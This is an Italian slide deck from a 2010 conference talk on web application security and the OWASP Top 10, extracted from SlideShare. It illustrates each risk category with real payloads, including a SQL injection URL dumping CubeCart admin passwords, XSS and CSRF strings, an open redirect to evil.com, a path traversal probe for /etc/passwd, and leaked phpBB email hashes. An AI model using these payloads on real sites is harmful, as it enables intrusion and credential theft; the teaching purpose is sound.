SlideShare uma empresa Scribd logo
1 de 82
Roma, Sabato 23 ottobre 2010
Web Application Security:
OWASP TOP 10 2010 tra
rischi, attacchi e difese
http://www.siatec.net/
Tendenze
Quali sono le ultime tendenze
nella sicurezza, nel 2010
IBM X-Force Threat Report
“For the first time web
application
vulnerabilities have
reached 50 per cent of
all code flaws reported”
IBM X-Force Threat Report
WebApp
55.95%
Altre
44.05%
Percentuale delle vulnerabilità scoperte che interessano Applicazioni
Web
IBM X-Force Threat Report
0
5000
10000
15000
20000
25000
1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010
Conteggio cumulativo delle segnalazioni rispetto le Applicazioni Web
…ma la TOP 10 non è
sulle vulnerabilità…
…è sui rischi…
…ma cos’è il rischio!?
Rischi e Vulnerabilità Il modello di definizione del
rischio secondo OWASP
ISO IEC Guide 73
“rischio: la
combinazione della
probabilità di un
evento e le sue
conseguenze”
Renzo Dell’Agnello
“Il rischio è la
possibilità di avere
un danno”
Probabilità ImpattoRischio
il rischio
Alessandro Sinibaldi
“...deriva dalla
combinazione di un
pericolo (threat) e di
una vulnerabilità”
Minaccia VulnerabilitàProbabilità
Minaccia
Pericolo
Agenti di
minaccia
Attaccanti
Gruppi di
attaccanti
Gruppo di
attacco
Threat
Agent
competenze
necessarie per
compiere l’attacco
motivazione
ad attaccare
opportunità
di attacco
dimensione
del gruppo degli
attaccanti
Vulnerabilità
Fattori legati
alla
Vulnerabilità
Vulnerability
facilità di
individuabilità
facilità di
sfruttamento
consapevolzza
dell’esistenza
quanto è facile da
individuare
un’intrusione?
Michele Cecioni
“il rischio dipende
anche dall'entità del
danno"
Impatto
tecnico
Impatto
sul
Business
Impatto
Impatto
tecnico
Technical
Impact
perdita di
riservatezza
perdita di
integrità
perdita di
disponibilità
perdita di
responsabilità
Impatto sul
Business
Impatto sulla
“missione”
Impatto sulla
missione
dell’organizzazione
Business
Impact
danno
finanziario
danno alla
reputazione
non conformità
violazione della privacy
Agente di
Attacco
Competenza
Motivazione
Opportunità
Dimensioni
Vulnerabilità
Facilità di
Individuabilità
Facilità di
sfruttamento
Conoscenza
della
vulnerabilità
Intrusion
detection
Impatto tecnico
Perdita di
riservatezza
Perdita di
integrità
Perdita di
disponibilità
Perdita di
responsabilità
Impatto sulla
missione
dell’organizzazione
Danno
finanziario
Danno alla
reputazione
Non
conformità
Violazione
della privacy
Il quadro del rischio
…e le applicazioni
web?
Beni
dell’organizzazione
dove impattano gli
attacchi
Stack Applicativo
Vulnerabilità
Agente
di minaccia
scenario
Agente
di minaccia
Agente
di minaccia
…stack applicativo?
Lo stack applicativo
Codice Applicativo
Interprete
Web Server
Database
Applicazioni
Sistema Operativo
Rete
OWASP TOP 10 2010
Quali sono le tendenze tra
vulnerabilità e rischi nel 2010
http://www.example.com/index.php?opt
ion=cookiecheck&return=http://www.ev
il.com/
Joomla <= 1.5
A10: Unvalidated
Redirects and
Forwards
40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:
34:b1:84:97:06:6f:
f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:
2d:e9:49:60:93:12:
0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0:
6e:e2:fe:e5:07:81: 82:fc Here is the
list of available SSLv2 ciphers:
RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP-
RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5
RC4-64-MD5
SSLv2
A9: Insufficient
Transport Layer
Protection
print
print "Target = http://" + blogURL +
"/?p=" + str(postID)
print
while 1:
# Start non authenticated enumeration
request = '/?p=' + str(postID)
conn.request("GET", request, "")
WordPress >= 2.9
A8: Failure to
Restrict URL Access
captcha-commits@lists.phpbb.com 54a946c47dd434b2
catdb-commits@lists.phpbb.com 6f543db8f086e11f
convertors-commits@lists.phpbb.com c192b68baacc8842
documentation-commits@lists.phpbb.com f85ffcdf9262420c
easymod-commits@lists.phpbb.com 5db5bf75be85191b
kbase-commits@lists.phpbb.com 7c843188ed2f6021
modteam-commits@lists.phpbb.com 533aeefe56bfa30c
prosilver-commits@lists.phpbb.com 859785a9cc724e03
website-commits@lists.phpbb.com 3c79b9864ae5ce43
phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4
st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa
iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8
packagemanager-commits@lists.phpbb.com 81657892dddafdca
moddocs-commits@lists.phpbb.com 85c837b7f78e5435
phpBB hacked
A7: Insecure
Cryptographic
Storage
<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat"
password="tomcat" roles="tomcat"/>
<user username="both"
password="tomcat"
roles="tomcat,role1"/>
<user username="role1"
password="tomcat" roles="role1"/>
</tomcat-users>
Tomcat tomcat-users.xml
A6: Security
Misconfiguration
<img src="http://www.example.com/s
aurus/admin/change_config.php?grou
p=1&site_name=hacked&slogan=hacked
&meta_title=hacked&meta_descriptio
n=hacked&meta_keywords=hacked&save
=1&flt_keel=1&page_end_html=&timez
one=">
Saurus CMS Admin Panel
A5: Cross-Site
Request Forgery
(CSRF)
POST
/?m=Profile&func=get_raw_blog_entr
y&user_id=<user_id>&ajax=1&store=0
&aja
x_target=none
HTTP/1.1
Host: wwwb21.tuenti.com
[...]
blog_entry_id=<another_blog_entry_
id>&csfr=<token>
Tuenti Social Network
A4: Insecure Direct
Object References
POST /CubeCart-
latest/admin.php?_g=maintenance/ba
ckup HTTP/1.1
Host: bld02
Content-Type: multipart/form-data;
boundary=----
WebKitFormBoundaryCpv+NVAHAgHHdvdI
User-Agent:
X_CLUSTER_CLIENT_IP:
Cookie: ccAdmin=+
Accept: */*;q=0.5
Content-Length: 434
CubeCart 4
A3: Broken
Authentication and
Session
Management
http://www.targetsite.net/
index.php?catid=1>'><Script%
20%0d%0a>Alert
XSS(406115679152)%3B</Scrip>
Cag's CMS
A2: Cross-Site
Scripting (XSS)
http://www.example.com/cart
/index.php?cat_id=19+union+s
elect+group_concat%28usernam
e,0x3a,password%29,2,3,4,5,6
,7,8+from+cube305_CubeCart_a
dmin_users—
CubeCart 2.0.1
A1: Injection
…
GET
/etc/passwd?format=%%&xss=">
<script>alert('xss');</scrip
t>&traversal=../../&sql='%20
OR%201;
…tratto da un vero TRACE
Conclusioni Domande e Riferimenti
Riferimenti
IBM X-Force: http://xforce.iss.net/
OWASP Testing Guide: http://www.owasp.org/index.php/OWASP_Testing_Project
OWASP TOP 10 2010:
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Grazie
Simone Onofri
simone.onofri@techub.it
http://www.techub.it

Mais conteúdo relacionado

Destaque

Introduction to CS60171 (2009)
Introduction to CS60171 (2009)Introduction to CS60171 (2009)
Introduction to CS60171 (2009)markvanharmelen
 
20061215 Gwng Learning Blogs
20061215 Gwng Learning Blogs20061215 Gwng Learning Blogs
20061215 Gwng Learning Blogssbooth
 
Web 2.0 and Learning and Teaching
Web 2.0 and Learning and TeachingWeb 2.0 and Learning and Teaching
Web 2.0 and Learning and Teachingmarkvanharmelen
 
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustIl Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustSimone Onofri
 
Training Program
Training ProgramTraining Program
Training Programngkaihoe
 
2008 03 01 Blogtalk Structured Portable Social Networks
2008 03 01 Blogtalk Structured Portable Social Networks2008 03 01 Blogtalk Structured Portable Social Networks
2008 03 01 Blogtalk Structured Portable Social Networkssbooth
 
Blogging and Internal Communications
Blogging and Internal CommunicationsBlogging and Internal Communications
Blogging and Internal Communicationssbooth
 
Enterprise2
Enterprise2Enterprise2
Enterprise2ngkaihoe
 
Creative Commons
Creative CommonsCreative Commons
Creative CommonsPia Hanslep
 
Being a Blogging Consultant
Being a Blogging ConsultantBeing a Blogging Consultant
Being a Blogging Consultantsbooth
 
H W Training Pp Nw
H W Training Pp   NwH W Training Pp   Nw
H W Training Pp Nwngkaihoe
 
Standards WakeUp: XHTML, CSS, Accessibilità e Semantica
Standards WakeUp: XHTML, CSS, Accessibilità e SemanticaStandards WakeUp: XHTML, CSS, Accessibilità e Semantica
Standards WakeUp: XHTML, CSS, Accessibilità e SemanticaSimone Onofri
 
Web 2.0 in Higher Education
Web 2.0 in Higher EducationWeb 2.0 in Higher Education
Web 2.0 in Higher Educationmarkvanharmelen
 
Born To Sing Living Your Childhood Dreams
Born To Sing   Living Your Childhood DreamsBorn To Sing   Living Your Childhood Dreams
Born To Sing Living Your Childhood Dreamsngkaihoe
 

Destaque (19)

Introduction to CS60171 (2009)
Introduction to CS60171 (2009)Introduction to CS60171 (2009)
Introduction to CS60171 (2009)
 
Rev1,1
Rev1,1Rev1,1
Rev1,1
 
Revelation 1st
Revelation 1stRevelation 1st
Revelation 1st
 
20061215 Gwng Learning Blogs
20061215 Gwng Learning Blogs20061215 Gwng Learning Blogs
20061215 Gwng Learning Blogs
 
Web 2.0 and Learning and Teaching
Web 2.0 and Learning and TeachingWeb 2.0 and Learning and Teaching
Web 2.0 and Learning and Teaching
 
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of TrustIl Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
Il Web del Futuro: Web Semantico + OpenID = Autenticazione Sicura e Web of Trust
 
Training Program
Training ProgramTraining Program
Training Program
 
2008 03 01 Blogtalk Structured Portable Social Networks
2008 03 01 Blogtalk Structured Portable Social Networks2008 03 01 Blogtalk Structured Portable Social Networks
2008 03 01 Blogtalk Structured Portable Social Networks
 
Italy and rome's geography
Italy and rome's geographyItaly and rome's geography
Italy and rome's geography
 
Blogging and Internal Communications
Blogging and Internal CommunicationsBlogging and Internal Communications
Blogging and Internal Communications
 
6mythsaboutservicelearning
6mythsaboutservicelearning6mythsaboutservicelearning
6mythsaboutservicelearning
 
Enterprise2
Enterprise2Enterprise2
Enterprise2
 
Berlin
BerlinBerlin
Berlin
 
Creative Commons
Creative CommonsCreative Commons
Creative Commons
 
Being a Blogging Consultant
Being a Blogging ConsultantBeing a Blogging Consultant
Being a Blogging Consultant
 
H W Training Pp Nw
H W Training Pp   NwH W Training Pp   Nw
H W Training Pp Nw
 
Standards WakeUp: XHTML, CSS, Accessibilità e Semantica
Standards WakeUp: XHTML, CSS, Accessibilità e SemanticaStandards WakeUp: XHTML, CSS, Accessibilità e Semantica
Standards WakeUp: XHTML, CSS, Accessibilità e Semantica
 
Web 2.0 in Higher Education
Web 2.0 in Higher EducationWeb 2.0 in Higher Education
Web 2.0 in Higher Education
 
Born To Sing Living Your Childhood Dreams
Born To Sing   Living Your Childhood DreamsBorn To Sing   Living Your Childhood Dreams
Born To Sing Living Your Childhood Dreams
 

Semelhante a Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese

Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Codemotion
 
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Simone Onofri
 
Progetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web ApplicationsProgetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web ApplicationsMarco Morana
 
Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017SMAU
 
Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)SMAU
 
CCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White HatCCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White Hatwalk2talk srl
 
Cyber Security Threats for Healthcare
Cyber Security Threats for HealthcareCyber Security Threats for Healthcare
Cyber Security Threats for HealthcareSWASCAN
 
Cybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADACybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADAiDIALOGHI
 
HealthCare CyberSecurity Swascan
HealthCare CyberSecurity SwascanHealthCare CyberSecurity Swascan
HealthCare CyberSecurity SwascanPierguido Iezzi
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Simone Onofri
 
Siti web, portali e Rich Internet Applications: tendenze e controtendenze
Siti web, portali e Rich Internet Applications: tendenze e controtendenzeSiti web, portali e Rich Internet Applications: tendenze e controtendenze
Siti web, portali e Rich Internet Applications: tendenze e controtendenzeDiego La Monica
 
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...Riccardo Melioli
 
Owasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_finalOwasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_finalMarco Morana
 
La sicurezza delle informazioni nell’era del web 2.0
La sicurezza delle informazioni nell’era del web 2.0La sicurezza delle informazioni nell’era del web 2.0
La sicurezza delle informazioni nell’era del web 2.0AmmLibera AL
 
La sicurezza delle reti aziendali ai tempi di Facebook
La sicurezza delle reti aziendali ai tempi di FacebookLa sicurezza delle reti aziendali ai tempi di Facebook
La sicurezza delle reti aziendali ai tempi di FacebookAmmLibera AL
 
I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012
I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012
I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012qlsrl
 
Symantec Internet Security Threat Report, Volume XIV
Symantec Internet Security Threat Report, Volume XIVSymantec Internet Security Threat Report, Volume XIV
Symantec Internet Security Threat Report, Volume XIVSymantec Italia
 
ProtezioneCyber - La soluzione assicurativa contro il cyber risk
ProtezioneCyber - La soluzione assicurativa contro il cyber riskProtezioneCyber - La soluzione assicurativa contro il cyber risk
ProtezioneCyber - La soluzione assicurativa contro il cyber riskM2 Informatica
 

Semelhante a Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese (20)

Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
 
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
Hackers vs Developers: vulnerabilità e soluzioni nello sviluppo di applicazio...
 
Progetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web ApplicationsProgetti Open Source Per La Sicurezza Delle Web Applications
Progetti Open Source Per La Sicurezza Delle Web Applications
 
Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017Marco Bozzetti AIPSI - SMAU Milano 2017
Marco Bozzetti AIPSI - SMAU Milano 2017
 
Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)Smau Milano 2019 Luca Bonadimani (AIPSI)
Smau Milano 2019 Luca Bonadimani (AIPSI)
 
2018 state of the software security report
2018 state of the software security report2018 state of the software security report
2018 state of the software security report
 
CCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White HatCCI 2019 - SQL Injection - Black Hat Vs White Hat
CCI 2019 - SQL Injection - Black Hat Vs White Hat
 
Cyber Security Threats for Healthcare
Cyber Security Threats for HealthcareCyber Security Threats for Healthcare
Cyber Security Threats for Healthcare
 
Owasp parte1-rel1.1
Owasp parte1-rel1.1Owasp parte1-rel1.1
Owasp parte1-rel1.1
 
Cybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADACybersecurity e Vulnerabilita' dei sistemi SCADA
Cybersecurity e Vulnerabilita' dei sistemi SCADA
 
HealthCare CyberSecurity Swascan
HealthCare CyberSecurity SwascanHealthCare CyberSecurity Swascan
HealthCare CyberSecurity Swascan
 
Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days Cyber Defense - How to find and manage zero-days
Cyber Defense - How to find and manage zero-days
 
Siti web, portali e Rich Internet Applications: tendenze e controtendenze
Siti web, portali e Rich Internet Applications: tendenze e controtendenzeSiti web, portali e Rich Internet Applications: tendenze e controtendenze
Siti web, portali e Rich Internet Applications: tendenze e controtendenze
 
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...
Presentazione Tesi di Laurea sulla Sicurezza delle Reti Informatiche: Le vuln...
 
Owasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_finalOwasp security summit_2012_milanovs_final
Owasp security summit_2012_milanovs_final
 
La sicurezza delle informazioni nell’era del web 2.0
La sicurezza delle informazioni nell’era del web 2.0La sicurezza delle informazioni nell’era del web 2.0
La sicurezza delle informazioni nell’era del web 2.0
 
La sicurezza delle reti aziendali ai tempi di Facebook
La sicurezza delle reti aziendali ai tempi di FacebookLa sicurezza delle reti aziendali ai tempi di Facebook
La sicurezza delle reti aziendali ai tempi di Facebook
 
I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012
I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012
I rischi delle nuvole... mondi virtuali sicurezze reali SMAU 2012
 
Symantec Internet Security Threat Report, Volume XIV
Symantec Internet Security Threat Report, Volume XIVSymantec Internet Security Threat Report, Volume XIV
Symantec Internet Security Threat Report, Volume XIV
 
ProtezioneCyber - La soluzione assicurativa contro il cyber risk
ProtezioneCyber - La soluzione assicurativa contro il cyber riskProtezioneCyber - La soluzione assicurativa contro il cyber risk
ProtezioneCyber - La soluzione assicurativa contro il cyber risk
 

Mais de Simone Onofri

Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
Attacking and Exploiting Ethereum Smart Contracts: Auditing 101Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
Attacking and Exploiting Ethereum Smart Contracts: Auditing 101Simone Onofri
 
Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Simone Onofri
 
Attacking Ethereum Smart Contracts a deep dive after ~9 years of deployment
Attacking Ethereum Smart Contracts  a deep dive after ~9 years of deploymentAttacking Ethereum Smart Contracts  a deep dive after ~9 years of deployment
Attacking Ethereum Smart Contracts a deep dive after ~9 years of deploymentSimone Onofri
 
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con LinuxLinux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con LinuxSimone Onofri
 
Agile Lean Conference 2017 - Leadership e facilitazione
Agile Lean Conference 2017 - Leadership e facilitazioneAgile Lean Conference 2017 - Leadership e facilitazione
Agile Lean Conference 2017 - Leadership e facilitazioneSimone Onofri
 
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...Simone Onofri
 
Agile Project Framework
Agile Project FrameworkAgile Project Framework
Agile Project FrameworkSimone Onofri
 
Agile nei servizi di cyber security (Security Summit Edition)
Agile nei servizi di cyber security (Security Summit Edition)Agile nei servizi di cyber security (Security Summit Edition)
Agile nei servizi di cyber security (Security Summit Edition)Simone Onofri
 
Security Project Management - Agile nei servizi di Cyber Security
Security Project Management - Agile nei servizi di Cyber SecuritySecurity Project Management - Agile nei servizi di Cyber Security
Security Project Management - Agile nei servizi di Cyber SecuritySimone Onofri
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTSimone Onofri
 
ISACA - Gestire progetti di Ethical Hacking secondo le best practices
ISACA - Gestire progetti di Ethical Hacking secondo le best practicesISACA - Gestire progetti di Ethical Hacking secondo le best practices
ISACA - Gestire progetti di Ethical Hacking secondo le best practicesSimone Onofri
 
OWASP AppSec EU 2016 - Security Project Management - How to be Agile in Secu...
OWASP AppSec EU 2016 - Security Project Management -  How to be Agile in Secu...OWASP AppSec EU 2016 - Security Project Management -  How to be Agile in Secu...
OWASP AppSec EU 2016 - Security Project Management - How to be Agile in Secu...Simone Onofri
 
Mamma, da grande voglio essere un Penetration Tester HackInBo 2016 Winter
Mamma, da grande voglio essere un Penetration Tester HackInBo  2016 WinterMamma, da grande voglio essere un Penetration Tester HackInBo  2016 Winter
Mamma, da grande voglio essere un Penetration Tester HackInBo 2016 WinterSimone Onofri
 
Penetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network SnifferPenetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network SnifferSimone Onofri
 
Agile e Lean Management
 Agile e Lean Management Agile e Lean Management
Agile e Lean ManagementSimone Onofri
 
Nuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersiNuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersiSimone Onofri
 
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesaHackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesaSimone Onofri
 
Agile Lean Management - MoSCoW, Timeboxing e Kanban
Agile Lean Management - MoSCoW, Timeboxing e KanbanAgile Lean Management - MoSCoW, Timeboxing e Kanban
Agile Lean Management - MoSCoW, Timeboxing e KanbanSimone Onofri
 
Agile lean conference - Agile, Lean & Business
Agile lean conference - Agile, Lean & BusinessAgile lean conference - Agile, Lean & Business
Agile lean conference - Agile, Lean & BusinessSimone Onofri
 

Mais de Simone Onofri (20)

Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
Attacking and Exploiting Ethereum Smart Contracts: Auditing 101Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
Attacking and Exploiting Ethereum Smart Contracts: Auditing 101
 
Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day
 
Attacking Ethereum Smart Contracts a deep dive after ~9 years of deployment
Attacking Ethereum Smart Contracts  a deep dive after ~9 years of deploymentAttacking Ethereum Smart Contracts  a deep dive after ~9 years of deployment
Attacking Ethereum Smart Contracts a deep dive after ~9 years of deployment
 
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con LinuxLinux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
Linux Day 2018 Roma - Web Application Penetration Test (WAPT) con Linux
 
Agile Lean Conference 2017 - Leadership e facilitazione
Agile Lean Conference 2017 - Leadership e facilitazioneAgile Lean Conference 2017 - Leadership e facilitazione
Agile Lean Conference 2017 - Leadership e facilitazione
 
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
Agile Business Consortium - LEGO SERIOUS PLAY e i Principi di Agile Project M...
 
Agile Project Framework
Agile Project FrameworkAgile Project Framework
Agile Project Framework
 
Agile nei servizi di cyber security (Security Summit Edition)
Agile nei servizi di cyber security (Security Summit Edition)Agile nei servizi di cyber security (Security Summit Edition)
Agile nei servizi di cyber security (Security Summit Edition)
 
Security Project Management - Agile nei servizi di Cyber Security
Security Project Management - Agile nei servizi di Cyber SecuritySecurity Project Management - Agile nei servizi di Cyber Security
Security Project Management - Agile nei servizi di Cyber Security
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APT
 
ISACA - Gestire progetti di Ethical Hacking secondo le best practices
ISACA - Gestire progetti di Ethical Hacking secondo le best practicesISACA - Gestire progetti di Ethical Hacking secondo le best practices
ISACA - Gestire progetti di Ethical Hacking secondo le best practices
 
OWASP AppSec EU 2016 - Security Project Management - How to be Agile in Secu...
OWASP AppSec EU 2016 - Security Project Management -  How to be Agile in Secu...OWASP AppSec EU 2016 - Security Project Management -  How to be Agile in Secu...
OWASP AppSec EU 2016 - Security Project Management - How to be Agile in Secu...
 
Mamma, da grande voglio essere un Penetration Tester HackInBo 2016 Winter
Mamma, da grande voglio essere un Penetration Tester HackInBo  2016 WinterMamma, da grande voglio essere un Penetration Tester HackInBo  2016 Winter
Mamma, da grande voglio essere un Penetration Tester HackInBo 2016 Winter
 
Penetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network SnifferPenetration Testing con Python - Network Sniffer
Penetration Testing con Python - Network Sniffer
 
ORM Injection
ORM InjectionORM Injection
ORM Injection
 
Agile e Lean Management
 Agile e Lean Management Agile e Lean Management
Agile e Lean Management
 
Nuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersiNuove minacce nella Cyber Security, come proteggersi
Nuove minacce nella Cyber Security, come proteggersi
 
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesaHackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
Hackers vs Developers - Cross Site Scripting (XSS) Attacco e difesa
 
Agile Lean Management - MoSCoW, Timeboxing e Kanban
Agile Lean Management - MoSCoW, Timeboxing e KanbanAgile Lean Management - MoSCoW, Timeboxing e Kanban
Agile Lean Management - MoSCoW, Timeboxing e Kanban
 
Agile lean conference - Agile, Lean & Business
Agile lean conference - Agile, Lean & BusinessAgile lean conference - Agile, Lean & Business
Agile lean conference - Agile, Lean & Business
 

Web Application Security: OWASP TOP 10 2010 tra rischi, attacchi e difese